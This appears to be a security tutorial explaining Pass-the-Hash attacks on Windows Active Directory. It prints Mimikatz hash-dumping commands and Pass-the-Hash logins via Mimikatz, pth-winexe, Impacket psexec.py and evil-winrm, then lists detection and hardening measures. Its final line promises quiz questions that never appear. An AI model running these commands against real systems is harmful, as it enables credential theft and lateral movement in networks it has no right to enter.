Pass-the-Hash(PtH)

What is a Pass-the-Hash (PtH) Attack?
Pass-the-Hash (PtH) is a post-exploitation attack where an attacker steals NTLM hashes and uses them to authenticate to systems without cracking the password.
 Why is PtH Dangerous?
●    No need to crack passwords – NTLM hashes act as authentication credentials.

●    Works even if multi-factor authentication (MFA) is enabled (if only NTLM is used).

●    Can be used for lateral movement in Active Directory (AD) environments.

________________________________________
 How Pass-the-Hash (PtH) Works? (Step-by-Step)
Step 1: Attacker Gains Access to a Machine
●    The attacker compromises a system (via phishing, exploit, or weak credentials).

●    The attacker gains local admin privileges on the machine.

Step 2: Dump NTLM Hashes from Memory
●    The attacker extracts stored NTLM hashes from LSASS (Local Security Authority Subsystem Service).

●    This can be done using tools like Mimikatz, Hashdump, or SAM database access.

 Example Mimikatz Command to Dump NTLM Hashes
mimikatz.exe
privilege::debug
lsadump::sam

 Extracts NTLM hashes from the system.
________________________________________
Step 3: Use the NTLM Hash to Authenticate Without a Password
●    Instead of cracking the NTLM hash, the attacker "passes" it to authenticate on remote systems.

●    This allows access to servers, shared drives, and Active Directory (AD) resources.

 Example PtH Attack Using Mimikatz
mimikatz.exe
sekurlsa::pth /user:Administrator /domain:example.com /ntlm:<HASH> /run:powershell.exe

 Runs a new session as Administrator using the NTLM hash.
________________________________________
Step 4: Lateral Movement and Privilege Escalation
●    The attacker moves across the network using Remote Desktop (RDP), SMB, or WinRM.

●    If the compromised account has Domain Admin privileges, the entire network is at risk.

 Example Using Pass-the-Hash to Access Another Machine
pth-winexe -U 'DOMAIN/Administrator%<NTLM-HASH>' //10.0.0.2 cmd.exe

 Executes commands on a remote machine using the stolen NTLM hash.
________________________________________
 

Tools Used for Pass-the-Hash (PtH) Attacks

________________________________________
 Example PtH Commands for Each Tool
 1. Dump NTLM Hashes with Mimikatz
mimikatz.exe
privilege::debug
sekurlsa::logonpasswords

 Extracts NTLM hashes from memory.
________________________________________
 2. Authenticate Using Impacket’s psexec.py
python3 psexec.py DOMAIN/[email protected] -hashes :<NTLM-HASH>

 Runs a command prompt on the target system using the hash.
________________________________________
 3. Remote Execution Using Evil-WinRM
evil-winrm -i 10.0.0.2 -u Administrator -H <NTLM-HASH>

 Gains remote PowerShell access using the stolen hash.
________________________________________
 4. SMB Pass-the-Hash Attack (pth-winexe)
pth-winexe -U 'DOMAIN/Administrator%<NTLM-HASH>' //10.0.0.2 cmd.exe

 Runs commands on a remote Windows machine via SMB using the stolen NTLM hash.
________________________________________
 How to Detect & Prevent Pass-the-Hash Attacks?

•  Detection (Blue Team)
•  Monitor Event ID 4624 (Logon Type 3 or 10 with NTLM authentication).
•   Look for suspicious logins using NTLM hashes instead of passwords.
•   Detect abnormal lateral movement between hosts (SIEM alerts).

 Prevention (Security Hardening)

•  Use Windows Defender Credential Guard to protect NTLM hashes.
•   Enable LSA Protection (RunAsPPL in registry) to prevent Mimikatz attacks.
•   Disable NTLM authentication where possible (force Kerberos).
•   Use strong passwords + MFA to prevent initial compromise.

________________________________________
Summary
●    Pass-the-Hash allows attackers to authenticate using NTLM hashes instead of passwords.

●    It’s commonly used for lateral movement and privilege escalation in AD environments.

●    Defenses include disabling NTLM, enabling Credential Guard, and monitoring suspicious logins.

Here are 15 one-word questions with their corresponding answers and hints based on the content about Pass-the-Hash (PtH) Attack: